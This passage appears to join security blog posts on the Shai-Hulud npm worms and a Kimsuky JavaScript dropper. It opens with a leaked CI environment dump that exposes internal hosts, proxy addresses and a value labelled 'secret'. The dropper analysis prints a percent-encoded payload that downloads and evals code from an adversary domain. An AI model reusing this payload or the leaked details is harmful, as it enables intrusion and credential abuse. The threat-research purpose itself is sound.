    "REPOSOLNS_DOCKER_SERVER": "docker.ci.artifacts.walmart.com",
    "REPOSOLNS_SCALA_REPO": "https://sbt.ci.artifacts.walmart.com/artifactory/ret-marketplace-sbt",
    "https_proxy": "http://10.167.213.150:43754",
    "JOB_NAME": "Feature-MultiBranch-PWT/AGAction",
    "IS_ENV_PREPPED": "true",
    "REPOSOLNS_MVN_RELEASE": "https://mvn.ci.artifacts.walmart.com/artifactory/ret-marketplace-mvn",
    "LOOPER_SONAR_TEST_URL": "https://sonar<redacted>producer.walmart.com/<redacted>-sonar-results",
    "INVOCATION_ID": "f834301562964d4eba8eb58e8204315f",
    "RUN_DISPLAY_URL": "https://runner-1-2175078775.<redacted>pro-prod-runner02.prod-ndc23.prod.walmart.com/job/Feature-MultiBranch-PWT/job/AGAction/22/display/redirect",
    "CHROMEDRIVER_CDNURL": "http://gec-maven-nexus.walmart.com/nexus/repository/googleapis-storage/chromedriver",
    "REPOSOLNS_NPM_REPO": "https://npm.ci.artifacts.walmart.com/artifactory/api/npm/ret-marketplace-npm",
    "LOOPER_SCM_URL": "https://gecgithub01.walmart.com/RET-Marketplace/mp-coee-pwt.git",
    "GIT_AUTHOR_EMAIL": "SVC-ciad-prod1@walmart.com",
    "REPOSOLNS_MVN_SNAPSHOT": "https://mvn.ci.artifacts.walmart.com/artifactory/ret-marketplace-mvn-snapshots-local",
    "LOOPER_FLOW": "init",
    "secret": "dde38c953e6fe119ebde4be3321ee547038ec555c4e9e5e9cc30b9a309a59383",
    "LOOPER_FLOW_TYPE": "BRANCH",
    "REPOSOLNS_GENERIC_SNAPSHOT_REPO": "https://generic.ci.artifacts.walmart.com/artifactory/ret-marketplace-generic-snapshots-local",
    "Project": "feature",
    "GITHUB_BRANCH_TITLE": "",
    "JOB_DISPLAY_URL": "https://runner-1-2175078775.<redacted>pro-prod-runner02.prod-ndc23.prod.walmart.com/job/Feature-MultiBranch-PWT/job/AGAction/display/redirect",
    "INIT_CWD": "/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/ws",
    "reposolnsPrepEnvStepOptions": "{{maxRetries = 3, timeout = 10, waitTime = 3, afUrl = 'https://ci.artifacts.walmart.com/artifactory/api/plugins/execute/EnvVariablesMap?params=org=_{LOOPER_SCM_OWNER_ID.toLowerCase()};type=properties'}}",
    "reposolnsUsername": "reposolns",
    "WORKSPACE": "/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/ws",
    "npm_lifecycle_script": "node setup_bun.js",
    "LOOPER_JOB_TYPE": "multibranch",
    "LOOPER_YAML_LOCATION": ".<redacted>Feature.yml",
    "GIT_PREVIOUS_COMMIT": "5595cbd56d1df1f15d859f5535d5c157f26b81df",
    "reposolns_context": "{{id = prod, access_tokens = {ci_write = {credentials_id = reposolns_vault_ci_write_creds_prod, token_id = reposolns_vault_ci_write_token_prod, url = https://akeyless.gw.prod.glb.us.walmart.net:8080, path = \"_{reposolns_context.id.replaceFirst('prod', '').replaceFirst('^(qa|stg)$', 'Non-')}Prod/reposolns/#{reposolns_context.id}/ci_write/_{LOOPER_SCM_OWNER_ID.toLowerCase()}\", af_username = reposolns, access_id = 'p-8dydleky17zq', access_type = ldap}}, technologies = [{access_token_id = ci_write, reference_id = docker.ci.artifacts.walmart.com, type = docker}, {access_token_id = ci_write, reference_id = 'docker.ci.artifacts.#{reposolns_context.id}.walmart.com', type = docker}, {access_token_id = ci_write, reference_id = 'af-snapshot', type = maven}, {access_token_id = ci_write, reference_id = 'af-release', type = maven}], environment = {REPOSOLNS_FQDN_CI = ci.artifacts.walmart.com, REPOSOLNS_URL = 'https://#{REPOSOLNS_FQDN_CI}/artifactory'}}}",
    "SONAR_SCANNER_OPTS1": "-Djavax.net.ssl.trustStore=/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/tools/nix_64/provenance-0.44.0/var/work/proxy-cacerts.jks -Djavax.net.ssl.trustStorePassword=foobar",
    "HUDSON_URL": "https://runner-1-2175078775.<redacted>pro-prod-runner02.prod-ndc23.prod.walmart.com/",
    "npm_package_optional": "",
    "REPOSOLNS_PYPI_BASEURL": "https://pypi.ci.artifacts.walmart.com/artifactory/api/pypi",
    "npm_config_npm_version": "10.7.0",
    "CURLOPT_CAPATH1": "/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/tools/nix_64/provenance-0.44.0/var/work/proxy-cacerts.pem",
    "GITHUB_BRANCH_FULL_REF": "refs/heads/AGAction",
    "GIT_COMMITTER_EMAIL": "SVC-ciad-prod1@walmart.com",
    "npm_package_name": "@postman/tunnel-agent",
    "GITHUB_BRANCH_NAME": "AGAction",
    "NODE_NAME": "<redacted>pro-prod-agent110-17",
    "LOOPER_RUN_ID": "03bd94b0-6650-4c5c-90c0-0c883b7746c6",
    "npm_config_prefix": "/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/tools/nix_64/nodejs-22.1.0",
    "GITHUB_BRANCH_HEAD_SHA": "16f766887ffda24e6cf41bbb3d900ada4aa1d881",
    "LOOPER_NAME": "Feature-MultiBranch-PWT/AGAction",
    "USER": "<redacted>",
    "npm_config_http_proxy": "http://sysproxy.wal-mart.com:8080",
    "JAVA_TOOL_OPTIONS": "-Dhttp.useProxy=true -Dhttps.useProxy=true -Dhttp.proxyHost=10.167.213.150 -Dhttp.proxyPort=43754 -Dhttps.proxyHost=10.167.213.150 -Dhttps.proxyPort=43754 -Dhttp.nonProxyHosts='localhost|127.0.0.1|cdn.cocoapods.org|*-keystone-endpoint.prod.walmart.com|cdn.jsdelivr.net|slack.com|*.blob.core.windows.net|mockDeliveryUrl|*.saucelabs.com|jira.walmart.com|*.prod.us.walmart.net|*.googleapis.com|euclid.azurecr.io|*xmatters.com|sandbox-cluboperations-claims.azurewebsites.net|accounts.google.com|usgta*.wal-mart.com|metadata.google.*|cloud.google.com|*ossindex.sonatype.org*|*.azure-api.net|sb.scorecardresearch.com|i.imgur.com|kafka-local-landoop|mock-server|vault|postgresql|active-mq|phonehome.hazelcast.com|*.azurewebsites.net|login.microsoftonline.com|dc.services.visualstudio.com|marketplace.walmartapis.com|*.saucelabs.com|blob.core.windows.net|file.appcenter.ms|testburst.walmart.com|tnest.walmart.com|gcr.io'",
    "NO_PROXY": ".us.wal-mart.com,localhost,127.0.0.1,dev.walmart.com,cdn.cocoapods.org,*-keystone-endpoint.prod.walmart.com,cdn.jsdelivr.net,slack.com,*.blob.core.windows.net,mockDeliveryUrl,ondemand.saucelabs.com,jira.walmart.com,*.prod.us.walmart.net,*.googleapis.com,euclid.azurecr.io,*xmatters.com,sandbox-cluboperations-claims.azurewebsites.net,accounts.google.com,usgta*.wal-mart.com,metadata.google.*,cloud.google.com,ossindex.sonatype.org,*.azure-api.net,*dev-transpo-fresh-pullforward-aggregator.azurewebsites.net/actuator/health,*samsclub.riversand.com*,sb.scorecardresearch.com,i.imgur.com,kafka-local-landoop,mock-server,vault,postgresql,active-mq,phonehome.hazelcast.com,*.azurewebsites.net,login.microsoftonline.com,dc.services.visualstudio.com,marketplace.walmartapis.com,*.saucelabs.com,blob.core.windows.net,file.appcenter.ms,testburst.walmart.com,tnest.walmart.com,gcr.io",
    "REPOSOLNS_HELM_SNAPSHOT_REPO": "https://helm.ci.artifacts.walmart.com/artifactory/ret-marketplace-helm-snapshots-local",
    "EmailReport": "false",
    "HUDSON_SERVER_COOKIE": "cad2bf9e97974601",
    "PHANTOMJS_CDNURL": "http://gec-maven-nexus.walmart.com/nexus/repository/PhantomJS",
    "TestAPPType": "UI",
    "REPOSOLNS_DOCKER_REPO": "ret-marketplace-docker",
    "NPM_CONFIG_USERCONFIG": "/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/tools/nix_64/nodejs-22.1.0/userconfig",
    "MART": "us",
    "proxy": "com.walmartlabs.<redacted>.engine.tools.ProxyConfig@56276214",
    "NPM_CONFIG_GLOBALCONFIG": "/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/tools/nix_64/nodejs-22.1.0/globalconfig",
    "NPM_REGISTRY_VARIANCE": "0",
    "npm_lifecycle_event": "preinstall",
    "APP_NAME": "ONDEMAND",
    "GIT_URL": "https://gecgithub01.walmart.com/RET-Marketplace/mp-coee-pwt.git",
    "SHLVL": "1",
    "BUILD_TAG": "jenkins-Feature-MultiBranch-PWT-AGAction-22",
    "SSL_CERT_FILE1": "/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/tools/nix_64/provenance-0.44.0/var/work/proxy-cacerts.pem",
    "HTTPS_PROXY": "http://10.167.213.150:43754",
    "PRIVATE_NPM_REGISTRY": "https://npm.ci.artifacts.walmart.com/artifactory/api/npm/ret-marketplace-npm/",
    "HTTP_PROXY": "http://10.167.213.150:43754",
    "EXECUTOR_NUMBER": "0",
    "reposolnsPassword": "<redacted>",
    "NPM_REGISTRY_PRIMARY": "https://npm.ci.artifacts.walmart.com/artifactory/api/npm/ret-marketplace-npm/",
    "TEST_RESULT": "false",
    "TRIGGER_REFSPEC": "+refs/heads/AGAction:refs/remotes/origin/AGAction",
    "REPOSOLNS_MVN_RELEASE_REPO": "https://mvn.ci.artifacts.walmart.com/artifactory/ret-marketplace-mvn-prod-local",
    "http_proxy": "http://10.167.213.150:43754",
    "JENKINS_HOME": "/<redacted>/<redacted>-workspace",
    "npm_config_user_agent": "npm/10.7.0 node/v22.1.0 linux x64 workspaces/false ci/jenkins",
    "npm_execpath": "/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/tools/nix_64/npm-10.7.0/node_modules/npm/bin/npm-cli.js",
    "CLASSPATH": "",
    "npm_config_strict_ssl": "",
    "NODE_PATH": "/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/tools/nix_64/npm-10.7.0/node_modules",
    "REQUESTS_CA_BUNDLE": "/etc/ssl/certs/ca-certificates.crt",
    "GIT_SSL_CAPATH1": "/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/tools/nix_64/provenance-0.44.0/var/work/proxy-cacerts.pem",
    "npm_package_json": "/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/ws/node_modules/@postman/tunnel-agent/package.json",
    "CODEGATE_JAR": "/mnt/<redacted>/tools/codegate/codegate-2.1003.11/codegate-2.1003.11-shaded.jar",
    "BASEDIR": "/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/ws",
    "GIT_COMMIT": "16f766887ffda24e6cf41bbb3d900ada4aa1d881",
    "NODE_LABELS": "ASSEMBLY-<redacted>pro-prod-agent110 CLOUD-prod-edc02 docker-daemon linux <redacted>pro-prod-agent110 <redacted>pro-prod-agent110-17",
    "Workers": "5",
    "JOURNAL_STREAM": "8:1438904637",
    "agent_name": "<redacted>pro-prod-agent110-17",
    "GIT_AUTHOR_NAME": "SVC-ciad-prod1",
    "REPOSOLNS_PYPI_URL": "https://pypi.ci.artifacts.walmart.com/artifactory/api/pypi",
    "npm_config_noproxy": "",
    "PATH": "/mnt/<redacted>/.bun/bin:/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/ws/node_modules/@postman/tunnel-agent/node_modules/.bin:/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/ws/node_modules/@postman/node_modules/.bin:/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/ws/node_modules/node_modules/.bin:/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/ws/node_modules/.bin:/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/node_modules/.bin:/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/node_modules/.bin:/mnt/<redacted>/workspace/node_modules/.bin:/mnt/<redacted>/node_modules/.bin:/mnt/node_modules/.bin:/node_modules/.bin:/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/tools/nix_64/npm-10.7.0/node_modules/npm/node_modules/@npmcli/run-script/lib/node-gyp-bin:/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/tools/nix_64/npm-10.7.0/node_modules/.bin:/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/tools/nix_64/jdk-1.8.0_161-b12/bin:/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/tools/nix_64/npm-10.7.0:/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/tools/nix_64/nodejs-22.1.0/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin",
    "ENV_UPPER": "",
    "npm_config_node_gyp": "/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/tools/nix_64/npm-10.7.0/node_modules/npm/node_modules/node-gyp/bin/node-gyp.js",
    "SQUAD": "GlobalMarketplace",
    "GIT_LOCAL_BRANCH": "AGAction",
    "REPOSOLNS_HELM_REPO": "https://helm.ci.artifacts.walmart.com/artifactory/ret-marketplace-helm",
    "CI": "true",
    "RUN_ARTIFACTS_DISPLAY_URL": "https://runner-1-2175078775.<redacted>pro-prod-runner02.prod-ndc23.prod.walmart.com/job/Feature-MultiBranch-PWT/job/AGAction/22/display/redirect?page=artifacts",
    "LOOPER_SHORT_NAME": "AGAction",
    "RUN_ID": "MPCOEE_AGAction-22",
    "taskId": "13",
    "npm_config_global_prefix": "/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/tools/nix_64/nodejs-22.1.0",
    "ARTIFACTORY_NPM_UPDATED": "true",
    "ak_Username": "SVC-MPCOEE-TEST1",
    "SHIELD_ONBOARDED": "false",
    "BRANCH_NAME": "AGAction",
    "GIT_BRANCH": "AGAction",
    "BUILD_ID": "22",
    "vault": "com.walmartlabs.<redacted>.engine.scopes.TypedSecrets@79a3d32d[credentials={ci_write=com.walmartlabs.<redacted>.engine.scopes.TypedSecrets$UsernamePassword@46a93cbf[username=reposolns,password=*******,type=username_password]},envs={REPOSOLNS_NPM_SNAPSHOT_REPO=https://npm.ci.artifacts.walmart.com/artifactory/api/npm/ret-marketplace-npm, REPOSOLNS_PYPI_REPO=https://pypi.ci.artifacts.walmart.com/artifactory/api/pypi/ret-marketplace-pypi, REPOSOLNS_SBT_SNAPSHOT_REPO=https://sbt.ci.artifacts.walmart.com/artifactory/ret-marketplace-sbt-snapshots-local, REPOSOLNS_HELM_REPO=https://helm.ci.artifacts.walmart.com/artifactory/ret-marketplace-helm, REPOSOLNS_DOCKER_REPO=ret-marketplace-docker, REPOSOLNS_FQDN_CI=ci.artifacts.walmart.com, REPOSOLNS_MVN_RELEASE_REPO=https://mvn.ci.artifacts.walmart.com/artifactory/ret-marketplace-mvn-prod-local, REPOSOLNS_URL=https://ci.artifacts.walmart.com/artifactory, REPOSOLNS_HELM_SNAPSHOT_REPO=https://helm.ci.artifacts.walmart.com/artifactory/ret-marketplace-helm-snapshots-local, REPOSOLNS_DOCKER_RELEASE_REPONAME=ret-marketplace-docker-prod-local, REPOSOLNS_SBT_REPO=https://sbt.ci.artifacts.walmart.com/artifactory/ret-marketplace-sbt, REPOSOLNS_DOCKER_SERVER=docker.ci.artifacts.walmart.com, REPOSOLNS_GENERIC_SNAPSHOT_REPO=https://generic.ci.artifacts.walmart.com/artifactory/ret-marketplace-generic-snapshots-local, REPOSOLNS_NPM_RELEASE_REPO=https://npm.ci.artifacts.walmart.com/artifactory/api/npm/ret-marketplace-npm-prod-local, REPOSOLNS_GENERIC_REPO=https://generic.ci.artifacts.walmart.com/artifactory/ret-marketplace-generic, REPOSOLNS_SBT_RELEASE_REPO=https://sbt.ci.artifacts.walmart.com/artifactory/ret-marketplace-sbt-prod-local, REPOSOLNS_DOCKER_SNAPSHOT_REPONAME=ret-marketplace-docker-snapshots-local, REPOSOLNS_SCALA_REPO=https://sbt.ci.artifacts.walmart.com/artifactory/ret-marketplace-sbt, REPOSOLNS_PYPI_RELEASE_REPO=https://pypi.ci.artifacts.walmart.com/artifactory/api/pypi/ret-marketplace-pypi-prod-local, REPOSOLNS_PYPI_URL=https://pypi.ci.artifacts.walmart.com/artifactory/api/pypi, REPOSOLNS_MVN_SNAPSHOT_REPO=https://mvn.ci.artifacts.walmart.com/artifactory/ret-marketplace-mvn-snapshots-local, REPOSOLNS_MVN_RELEASE=https://mvn.ci.artifacts.walmart.com/artifactory/ret-marketplace-mvn, REPOSOLNS_MVN_SNAPSHOT=https://mvn.ci.artifacts.walmart.com/artifactory/ret-marketplace-mvn-snapshots-local, REPOSOLNS_HELM_RELEASE_REPO=https://helm.ci.artifacts.walmart.com/artifactory/ret-marketplace-helm-prod-local, REPOSOLNS_VIRTUAL_DEFAULT_DEPLOYMENT=-prod-local, REPOSOLNS_GENERIC_RELEASE_REPO=https://generic.ci.artifacts.walmart.com/artifactory/ret-marketplace-generic-prod-local, REPOSOLNS_NPM_REPO=https://npm.ci.artifacts.walmart.com/artifactory/api/npm/ret-marketplace-npm, REPOSOLNS_MVN_REPO=https://mvn.ci.artifacts.walmart.com/artifactory/ret-marketplace-mvn, REPOSOLNS_NPM_BASEURL=https://npm.ci.artifacts.walmart.com/artifactory/api/npm, REPOSOLNS_DOCKER_REPONAME=ret-marketplace-docker, REPOSOLNS_PYPI_BASEURL=https://pypi.ci.artifacts.walmart.com/artifactory/api/pypi, REPOSOLNS_PYPI_SNAPSHOT_REPO=https://pypi.ci.artifacts.walmart.com/artifactory/api/pypi/ret-marketplace-pypi-snapshots-local},techs=[com.walmartlabs.<redacted>.engine.scopes.TypedSecrets$DockerScope@62351a8a[credname=ci_write,email=<null>,server=docker.ci.artifacts.walmart.com], com.walmartlabs.<redacted>.engine.scopes.TypedSecrets$DockerScope@710a2d26[credname=ci_write,email=<null>,server=docker.ci.artifacts.prod.walmart.com], com.walmartlabs.<redacted>.engine.scopes.TypedSecrets$MavenScope@16d7b291[credname=ci_write,id=af-snapshot], com.walmartlabs.<redacted>.engine.scopes.TypedSecrets$MavenScope@19143830[credname=ci_write,id=af-release]]]",
    "npm_config_cafile": "/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/tools/nix_64/provenance-0.44.0/var/work/proxy-cacerts.pem",
    "npm_node_execpath": "/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction/tools/nix_64/nodejs-22.1.0/bin/node",
    "npm_config_https_proxy": "http://10.167.213.150:43754",
    "WS_ROOT": "/mnt/<redacted>/workspace/Feature-MultiBranch-PWT/AGAction",
    "REPOSOLNS_GENERIC_RELEASE_REPO": "https://generic.ci.artifacts.walmart.com/artifactory/ret-marketplace-generic-prod-local",
    "REPOSOLNS_URL": "https://ci.artifacts.walmart.com/artifactory",
    "npm_package_engines_node": "*",
    "POSTINSTALL_BG": "1"
  }
}

truffleSecrets.json

This file contains all of the data collected by TruffleHog, including credentials and secrets for various platforms. Like the other JSON files, this file is also double base64-encoded.

Mitigation Recommendations

As highlighted in the previous Shai-Hulud blog, it is always difficult to detect and respond to supply chain compromises. It is not always clear where these packages are used and what other libraries use them. We recommend taking the following actions:

• Review the list of compromised packages below and audit your development environment for them
• Rotate all GitHub, npm, cloud, and CI/CD secrets
• Check GitHub for repositories that have been made public
• Check GitHub for repositories that have the description Sha1-Hulud: The Second Coming
• Audit GitHub for any unauthorized workflows
• Deploy phishing-resistant MFA solutions for CI/CD pipelines and developers
• Monitor any newly published npm packages within the organization
• Disable post-install scripts

Compromise Packages

This list of packages below is accurate as of 15:00 EST on November 24, 2025. As this is an evolving situation, this list may not be complete and is expected to change over time.

References

• https://www.aikido.dev/blog/shai-hulud-strikes-again-hitting-zapier-ensdomains
• https://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attack
• https://socket.dev/blog/shai-hulud-strikes-again-v2
• https://blog.pulsedive.com/npm-compromise-the-wrath-of-the-shai-hulud-supply-chain-attack/
• https://about.gitlab.com/blog/gitlab-discovers-widespread-npm-supply-chain-attack/
• https://helixguard.ai/blog/malicious-sha1hulud-2025-11-24
• https://unit42.paloaltonetworks.com/npm-supply-chain-attack/

Last month, our team came across a few X posts about indicators of compromise related to Kimsuky, a North Korean threat group that has been active since 2012. Kimsuky is predominantly responsible for conducting espionage operations against government entities, think tanks, and subject matter experts. The initial post that we saw contained a network IOC, a file hash, and the names of some LNK files. Security researcher @naumovax subsequently shared snippets of network traffic and a link to an Any.Run Sandbox submission. This blog analyzes the initial sample, how it downloads additional stages, and the network traffic observed within the infection chain. 

Initial Sample Details

The first file observed within this intrusion chain is a JavaScript file called Themes.js. This file starts the intrusion chain by downloading an additional payload from the adversary-controlled infrastructure. The initial JavaScript file is not obfuscated, and its only purpose is to download and execute content from a website. The entire code is encapsulated within a try-catch block. The file initiates a GET request to iuh234[.]medianewsonline[.]com. to the URI /dwnkl[.]php with the parameters:

Median News is a website that allows users to create subdomains for websites or other projects. While the medianewsonline website is not inherently malicious, threat actors can create subdomains on it that can be used for malicious activity.

The initial JavaScript file initiates a GET request to an adversary-controlled infrastructure, with the computer name being passed as a parameter in the URI. The script then attempts to execute the data returned by the server.

Sample Details

MalwareBazaar | Checking your browser

Checking your browser

Downloaded Second Stage

The server responds to the GET request with some more JavaScript code. This code consists of five functions and a try-catch block. The code attempts to collect system information, a list of running processes, and a list of files in the Users folder. Once each set of data has been collected, the code attempts to upload the command's output to the adversary-controlled domain. Once all the data has been exfiltrated, the code tries to delete any temporary files created.

The script attempts to run four commands, with three commands attempting to collect system and file information from the compromised host. The final command is used to delete temporary files that have been created (these files are used to hold the information to be exfiltrated).

The first command executed collects system information, an example of which is shown in Figure 16. The following command is used to obtain a list of all running processes on the host (Figure 17). The last reconnaissance command navigates to the C:\\Users directory and lists all the files and subdirectories within it by listing the newest files first. This command also lists the attributes for each file within that directory. An example of this is illustrated in Figure 18. After each command is executed, its results are uploaded to the C2 server. The last function changes the working directory to the %TEMP% directory and deletes any .tmp file within that directory. 

Execute Command

The execute command is used to modify the registry key HKCU\\Console\\CodePage by creating the key with the value 65001. This sets the input and output encoding to UTF-8. The code then creates a file in the %TEMP%directory with a randomly generated file name. This is used to hold the content of the commands that were executed.

Upload Result

Data is exfiltrated to the URI /umprl.php?uid= with the computer name specified as a parameter. The JavaScript code then creates a file to hold the content of the data to be exfiltrated. The data is exfiltrated as part of a POST request where the request body contains the cabinet file with the exfiltrated data.

Helper Functions

Make File

The strPrefix variable is an empty string, so any newly created file will be named after the date it was made. 

Read File

This function takes a file name as a parameter, opens a buffer to read the file, and then closes it.

Prepare File for Upload

All content to be exfiltrated is turned into a .cab (cabinet) file and encoded using the certutil LOLBIN. 

Exfiltrated Data

Data is exfiltrated through POST requests to iuh234[.]medianewsonline[.]com/umprl[.]php?uid=. The first request exfiltrates system information, while the second one contains details about all the processes running on the system at that time. The last request includes details about files and directories within the C:\Users directory.

Third Stage - A Word Document

For every POST request sent by the second stage, the C2 server returns the same content. This is another JavaScript file that executes two functions. The webpage return is resized to 0 and moved off the display window in an attempt to further hide the code.

Establishing Persistence (MKSCHD Function - Make Scheduled Task)

This stage begins by calling the MKSCHD function with the string "Windows Themes Manager". This function contains hardcoded data that is URI percent-encoded data. Before the content is decoded, the JavaScript modifies the HKCU\\Console\\CodePage registry by adding an entry with the value 65001. When decoded, the data is the code outline in the initial sample.

%74%72%79%20%7B%0D%0A%09%76%61%72%20%77%6E%6B%20%3D%20%6E%65%77%20%41%63%74%69%76%65%58%4F%62%6A%65%63%74%28%27%57%53%63%72%69%70%74%2E%4E%65%74%77%6F%72%6B%27%29%3B%0D%0A%09%76%61%72%20%78%68%20%3D%20%6E%65%77%20%41%63%74%69%76%65%58%4F%62%6A%65%63%74%28%22%4D%69%63%72%6F%73%6F%66%74%2E%58%4D%4C%48%54%54%50%22%29%3B%0D%0A%09%78%68%2E%6F%70%65%6E%28%22%47%45%54%22%2C%20%22%68%74%74%70%3A%2F%2F%69%75%68%32%33%34%2E%6D%65%64%69%61%6E%65%77%73%6F%6E%6C%69%6E%65%2E%63%6F%6D%2F%64%77%6E%6B%6C%2E%70%68%70%3F%75%69%64%3D%22%2B%77%6E%6B%2E%63%6F%6D%70%75%74%65%72%4E%61%6D%65%2B%22%26%6B%65%79%3D%6B%78%22%2C%20%66%61%6C%73%65%29%3B%0D%0A%09%78%68%2E%73%65%6E%64%28%22%22%29%3B%0D%0A%09%65%76%61%6C%28%78%68%2E%72%65%73%70%6F%6E%73%65%54%65%78%74%29%3B%0D%0A%7D%0D%0A%63%61%74%63%68%20%28%65%72%72%29%20%7B%7D

The decoded content is written to a file called Themes.js, which is written to the %APPDATA%\\Microsoft\\Windows\\Themes\\Themes.js. Once the file is written to disk, a scheduled task is created that runs every minute with the task name Windows Theme Manager, which calls wscript.exe to execute the file.

OPDOM

The next function, OPDOM, is called, which takes the value E-CARD.docx as a parameter. This function contains base64 encoded data, which is saved to a file called L298306.tmp in the %Public% directory. This file is then decoded using the certutil LOLBIN, after which the temp file is deleted.

Decoding the base64 data within the function reveals that it is a Word document. Running the Word document through a sandbox reveals an empty document.

VirusTotal

VirusTotal

VirusTotal

Analysis download.zip (MD5: 1010DABFA2662FD1007376F6EC814036) No threats detected - Interactive analysis ANY.RUN

Interactive malware hunting service. Live testing of most type of threats in any environments. No installation and no waiting necessary.

Interactive analysis ANY.RUN

Conclusion

Analysis of the Kimsuky sample revealed two additional JavaScript files and a Word Document. Since the Word document is empty and does not run any macros in the background, it may be a lure. Moreover, as the initial access vector is unknown, we cannot say how the initial Theme.js file is delivered to the user.

Recommendations

Methods to mitigate the risks posed by malware include:

• Deploy EDR/AV solutions
  • EDR or AV solutions can detect malicious process chains, anomalous activity, and suspicious files that may indicate a malware infection.
• User Education
  • Users can help mitigate the risk of information-stealing malware infections by avoiding suspicious websites and using authorized software in corporate environments.

Indicators of Compromise

The table below lists network IOCs identified during our analysis.

Additional IOCs related to Kimsuky can be queried in Pulsedive using the Explore query threat=Kimsuky, and are available for export in multiple formats (CSV, STIX 2.1, JSON).

MITRE ATT&CK TTPs

References

• https://x.com/suyog41/status/1962466397612834892
• https://x.com/naumovax/status/1965055436039839952
• https://app.any.run/tasks/f19a2b0f-1c63-4b83-a743-250a6e9325a6
• https://www.virustotal.com/gui/file/596cd0d30fe035e8be1dd9d78c1f71a8fc0e2c653d1318af26c51758339ca6bd/detection
• https://bazaar.abuse.ch/sample/596cd0d30fe035e8be1dd9d78c1f71a8fc0e2c653d1318af26c51758339ca6bd

resources/Kimsuky/2025-10 - JavaScript Dropper at main · pulsedive-research/resources

Contribute to pulsedive-research/resources development by creating an account on GitHub.

GitHubpulsedive-research

In September 2025, multiple NPM packages were compromised. Some of the compromised packages were highly popular, with millions of downloads per week. Two different sets of compromises were observed:

• The first compromise occurred around September 8th, 2025, when the packages were embedded with the ability to replace cryptocurrency wallets with adversary-controlled ones. 
• The second compromise utilized the Shai-Hulud worm, which was employed to exfiltrate sensitive information from GitHub repositories. 
  • Initial reports about the Shai-Hulud worm emerged on September 15, 2025. GitGuardian observed activity related to this compromise from September 15 at 03:46 to September 16 at 13:42.

GitHub's Response: In response to the Shai-Hulud attack, GitHub removed over 500+ compromised packages from the npm registry. Additionally, npm blocked new packages that contained known indicators of compromise from being uploaded to the registry.

This blog will walk through both compromises and provide insights into the functionality of the malicious packages, as well as response recommendations. 

First Compromise: September 8th Campaign

The campaign was first reported on September 8th, 2025, and the list of compromised packages included chalk and debug. Both are very popular npm packages, each of which is downloaded over 250 million times a week. The packages were modified to include malicious code that was subsequently executed.

This attack began by compromising a maintainer’s account with a phishing email and using the account to modify the packages. The threat actor registered the domain npmjs[.]help on Porkbun on September 5th, 2025. 

A GitHub Gist contains the index.js file for the compromised version of the chalk npm package. The same code shown on line 12 of Figure 3 above is also present in the Gist.

The obfuscated code can be deobfuscated using tools such as deobfuscate.io. The first round of deobfuscation reveals code containing a list of cryptocurrency wallets, including Bitcoin, Bitcoin Cash, Litecoin, TRON, and Solana. While still heavily obfuscated, analysts can still review the code and understand its functionality.

Various cryptocurrency wallets are hardcoded within the file, and there are references to different types of cryptocurrency. 

The malicious code also contains RegEx to match different types of cryptocurrency wallets. The malware intercepts connections to cryptocurrency platforms and replaces the wallet in the request with one of the hardcoded wallets. This allows them to replace payment destinations for adversary-controlled ones, achieved by either injecting itself into functions such as fetch, XMLHttpRequest, or through wallet APIs.

Second Compromise: Shai-Hulud Attack

The Shai-Hulud compromise differed from the previous attack in that it didn’t target cryptocurrency transactions, but was instead used to exfiltrate secrets from GitHub repositories. Significantly more npm packages were compromised in this subsequent attack. GitGuardian observed activity related to this compromise from September 15 at 03:46 to September 16 at 13:42. The malware utilized the TruffleHog tool to locate and collect credentials and secrets. Any data that was collected was exfiltrated via GitHub actions to the webhook[.]site domain.

As part of the attack, GitHub workflows were used to convert private repositories to public ones. The repositories that were turned into public ones had the description “Shai-Hulud Migration”, and the term -migration" was added to the name. 

The malware also attempts to exfiltrate the following credentials:

• GitHub personal access tokens
• AWS access keys (AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY)
• Google Cloud Platform service credentials
• Azure credentials
• Cloud metadata endpoints
• NPM authentication tokens

The malicious JavaScript file is available for analysis through Malware Bazaar.

MalwareBazaar | Checking your browser

Checking your browser

VirusTotal

VirusTotal

VirusTotal

The malware has self-propagation functionality through the updatePackage function. This queries the NPM registry to download the packages owned by the maintainer. Once these are downloaded, the bundle.js file containing the malware is written to the package. Once this file has been written, the package is republished. 

Apart from updating other packages owned by the compromised maintainer, the malware downloads TruffleHog to collect secrets stored within the repo. The first step in running TruffleHog is to check the operating system architecture and type. From there, the latest version of TruggleHog is downloaded and installed. 

Apart from collecting secrets and staging them for exfiltration, it creates a repo with the description “Shai-Hulud” as shown in Figure 16 below. 

The data is exfiltrated using a GitHub workflow. The content of the workflow is hardcoded in the malicious file.

on:
  push:
